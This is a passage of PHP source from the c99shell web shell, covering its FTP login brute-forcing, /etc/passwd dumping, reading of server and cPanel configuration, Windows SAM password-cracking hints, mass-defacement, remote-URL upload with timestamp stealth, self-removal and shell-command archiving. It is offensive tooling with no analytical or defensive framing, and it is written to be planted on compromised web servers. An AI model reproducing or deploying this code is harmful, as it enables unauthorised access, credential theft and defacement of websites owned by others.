$str = explode(":",fgets($fp,2048));
$sock = ftp_connect("localhost",21,1);
if (ftp_login($sock,$str[0],$str[0]))
{
echo "Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\".
";
ob_flush();
$success++;
}
if ($i > $nixpwdperpage) {break;}
$i++;
}
if ($success == 0) {echo "No success. connections!";}
$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
echo "

Done!
Total time (secs.): ".$ftpquick_t."
Total connections: ".$i."
Success.: ".$success."
Unsuccess.:".($i-$success)."
Connects per second: ".round($i/$ftpquick_t,2)."
";
}
}
}
if ($act == "lsa")
{
echo "Server security information:";
echo "Software: ".PHP_OS.", ".$SERVER_SOFTWARE."
";
echo "Safe-Mode: ".$hsafemode."
";
echo "Open base dir: ".$hopenbasedir."
";
if (!$win)
{
if ($nixpasswd)
{
if ($nixpasswd == 1) {$nixpasswd = 0;}
$num = $nixpasswd + $nixpwdperpage;
echo "*nix /etc/passwd:
";
$i = $nixpasswd;
while ($i < $num)
{
$uid = posix_getpwuid($i);
if ($uid) {echo join(":",$uid)."
";}
$i++;
}
}
else {echo "
Get /etc/passwd
";}
if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
";}
if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
";}
if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
";}
}
else
{
$v = $_SERVER["WINDIR"]."\repair\sam";
if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
";}
else {echo "You can crack winnt passwords. Download, and use lcp.crack+.
";}
}
}
if ($act == "mkfile")
{
if ($mkfile != $d)
{
if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";}
elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";}
else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
}
else {$act = $dspact = "ls";}
}
if ($act == "fsbuff")
{
$arr_copy = $sess_data["copy"];
$arr_cut = $sess_data["cut"];
$arr = array_merge($arr_copy,$arr_cut);
if (count($arr) == 0) {echo "Buffer is empty!";}
else
{
echo "File-System buffer

";
$ls_arr = $arr;
$disp_fullpath = true;
$act = "ls";
}
}

if ($act == "selfremove")
{
if (!empty($submit))
{
if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using PHP Shell v.".$shver."!"; exit; }
else {echo "Can't delete ".__FILE__."!";}
}
else
{
$v = array();
for($i=0;$i<8;$i++) {$v[] = "NO";}
$v[] = "YES";
shuffle($v);
$v = join(" ",$v);
echo "Self-remove: ".__FILE__."
Are you sure?".$v."";
}
}
if ($act == "massdeface")
{
if (empty($deface_in)) {$deface_in = $d;}
if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}

if (!empty($submit))
{
$found = array();
$found_d = 0;
$found_f = 0;

$text = $deface_text;
$text_regexp = $deface_text_regexp;
if (empty($text)) {$text = " "; $text_regexp = 1;}

$a = array
(
"name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
"text"=>$text, "text_regexp"=>$text_regxp,
"text_wwo"=>$deface_text_wwo,
"text_cs"=>$deface_text_cs,
"text_not"=>$deface_text_not
);
$defacetime = getmicrotime();
$in = array_unique(explode(";",$deface_in));
foreach($in as $v) {c99fsearch($v);}
$defacetime = round(getmicrotime()-$defacetime,4);
if (count($found) == 0) {echo "No files found!";}
else
{
$disp_fullpath = true;
$act = $dspact = "ls";
if (!$deface_preview) {$actselect = "deface"; $actbox[] = $found; $notls = true;}
else {$ls_arr = $found;}
}
}
else
{
if (empty($deface_preview)) {$deface_preview = 1;}
if (empty($deface_html)) {$deface_html = "

Mass-defaced with c99shell v. ".$shver.", coded by tristram[CCTeaM].";}
}
echo "";
if ($act == "ls") {echo "

Deface took ".$defacetime." secs

";}
}
if ($act == "search")
{
if (empty($search_in)) {$search_in = $d;}
if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
if (empty($search_text_wwo)) {$search_text_regexp = 0;}

if (!empty($submit))
{
$found = array();
$found_d = 0;
$found_f = 0;
$a = array
(
"name"=>$search_name, "name_regexp"=>$search_name_regexp,
"text"=>$search_text, "text_regexp"=>$search_text_regxp,
"text_wwo"=>$search_text_wwo,
"text_cs"=>$search_text_cs,
"text_not"=>$search_text_not
);
$searchtime = getmicrotime();
$in = array_unique(explode(";",$search_in));
foreach($in as $v)
{
c99fsearch($v);
}
$searchtime = round(getmicrotime()-$searchtime,4);
if (count($found) == 0) {echo "No files found!";}
else
{
$ls_arr = $found;
$disp_fullpath = true;
$act = $dspact = "ls";
}
}
echo "";
if ($act == "ls") {echo "

Search took ".$searchtime." secs

";}
}
if ($act == "upload")
{
$uploadmess = "";
$uploadpath = str_replace("\\","/",$uploadpath);
if (empty($uploadpath)) {$uploadpath = $d;}
elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
if (!empty($submit))
{
global $HTTP_POST_FILES;
$uploadfile = $HTTP_POST_FILES["uploadfile"];
if (!empty($uploadfile[tmp_name]))
{
if (empty($uploadfilename)) {$destin = $uploadfile[name];}
else {$destin = $userfilename;}
if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!
";}
}
elseif (!empty($uploadurl))
{
if (!empty($uploadfilename)) {$destin = $uploadfilename;}
else
{
$destin = explode("/",$destin);
$destin = $destin[count($destin)-1];
if (empty($destin))
{
$i = 0;
$b = "";
while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
}
if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
";}
else
{
$st = getmicrotime();
$content = @file_get_contents($uploadurl);
$dt = round(getmicrotime()-$st,4);
if (!$content) {$uploadmess .= "Can't download file!
";}
else
{
if ($filestealth) {$stat = stat($uploadpath.$destin);}
$fp = fopen($uploadpath.$destin,"w");
if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
";}
else
{
fwrite($fp,$content,strlen($content));
fclose($fp);
if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
}
}
}
}
}
if ($miniform)
{
echo "".$uploadmess."";
$act = "ls";
}
else
{
echo "File upload:
".$uploadmess."";
}
}
if ($act == "delete")
{
$delerr = "";
foreach ($actbox as $v)
{
$result = false;
if (empty($v)) {}
$result = fs_rmobj($v);
if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
";}
if (!empty($delerr)) {echo "Deleting with errors:
".$delerr;}
}
}
if ($act == "deface")
{
$deferr = "";
foreach ($actbox as $v)
{
$result = false;
if (empty($v)) {}
$result = fopen();
if (!$result) {$deferr .= "Can't delete ".htmlspecialchars($v)."
";}
if (!empty($delerr)) {echo "Deleting with errors:
".$deferr;}
}
}
if (!$usefsbuff)
{
if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.";}
}
else
{
if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";}
if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";}

if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
elseif ($actpastebuff)
{
$psterr = "";
foreach($sess_data["copy"] as $k=>$v)
{
$to = $d.basename($v);
if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
";}
if ($copy_unset) {unset($sess_data["copy"][$k]);}
}
foreach($sess_data["cut"] as $k=>$v)
{
$to = $d.basename($v);
if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
";}
unset($sess_data["cut"][$k]);
}
c99_sess_put($sess_data);
if (!empty($psterr)) {echo "Pasting with errors:
".$psterr;}
}
elseif ($actarcbuff)
{
$arcerr = "";
if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
else {$ext = ".tar.gz";}

if ($ext == ".tar.gz")
{
$cmdline = "tar cfzv";
}
$objects = array_merge($sess_data["copy"],$sess_data["cut"]);
foreach($objects as $v)
{
$v = str_replace("\\","/",$v);
if (is_dir($v))
{
if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
$v .= "*";
}
$cmdline .= " ".$v;
}
$ret = `$cmdline`;
if (empty($ret)) {$arcerr .= "Can't call archivator!
";}
$ret = str_replace("\r\n","\n");
$ret = explode("\n",$ret);
if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
foreach($sess_data["cut"] as $k=>$v)
{
if (in_array($v,$ret)) {fs_rmobj($v);}
unset($sess_data["cut"][$k]);
}
c99_sess_put($sess_data);
if (!empty($arcerr)) {echo "Archivation errors:
".$arcerr;}
$act = "ls";
}
elseif ($actpastebuff)
{
$psterr = "";
foreach($sess_data["copy"] as $k=>$v)
{
$to = $d.basename($v);
if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
";}
if ($copy_unset) {unset($sess_data["copy"][$k]);}
}
foreach($sess_data["cut"] as $k=>$v)
{
$to = $d.basename($v);
if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
";}
unset($sess_data["cut"][$k]);
}
c99_sess_put($sess_data);
if (!empty($psterr)) {echo "Pasting with errors:
".$psterr;}
}
}
if ($act == "ls")
{
if (count($ls_arr) > 0) {$list = $ls_arr;}
else
{
$list = array();
if ($h = @opendir($d))
{
while ($o = readdir($h)) {$list[] = $d.$o;}
closedir($h);
}
}
if (count($list) == 0) {echo "Can't open directory (".htmlspecialchars($d).")!";}
else
{
//Building array
$tab = array();
$amount = count($ld)+count($lf);
$vd = "f"; //Viewing mode
if ($vd == "f")
{
$row = array();
$row[] = "Name";
$row[] = "Size";
$row[] = "Modify";
if (!$win)
{$row[] = "Owner/Group";}
$row[] = "Perms";
$row[] = "Action";

$k = $sort[0];
if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
if ($sort[1] == "a")
{
$y = "";
}
else
{
$y = "";
}

$row[$k] .= $y;
for($i=0;$i {
if ($i != $k) {$row[$i] = "".$row[$i]."";}
}

$tab = array();
$tab[cols] = array($row);
$tab[head] = array();
$tab[dirs] = array();
$tab[links] = array();
$tab[files] = array();

foreach ($list as $v)
{
$o = basename($v);
$dir = dirname($v);

if ($disp_fullpath) {$disppath = $v;}
else {$disppath = $o;}
$disppath = str2mini($disppath,60);

if (in_array($v,$sess_data["cut"])) {$disppath = "~~".$disppath."~~";}
elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";}

$uo = urlencode($o);
$ud = urlencode($dir);
$uv = urlencode($v);

$row = array();

if ($o == ".")
{
$row[] = " ".$o."";
$row[] = "LINK";
}
elseif ($o == "..")
{
$row[] = " ".$o."";
$row[] = "LINK";
}
elseif (is_dir($v))
{
if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
else {$type = "DIR";}
$row[] = " [".$disppath."]";
$row[] = $type;
}
elseif(is_file($v))
{
$ext = explode(".",$o);
$c = count($ext)-1;
$ext = $ext[$c];
$ext = strtolower($ext);
$row[] = " ".$disppath."";
$row[] = view_size(filesize($v));
}
$row[] = date("d.m.Y H:i:s",filemtime($v));

if (!$win)
{
$ow = @posix_getpwuid(fileowner($v));
$gr = @posix_getgrgid(filegroup($v));
$row[] = $ow["name"]."/".$gr["name"];
}

if (is_writable($v)) {$row[] = "".view_perms(fileperms($v))."";}
else {$row[] = "".view_perms(fileperms($v))."";}

if (is_dir($v)) {$row[] = " ";}
else {$row[] = " $\"Download\"$ ";}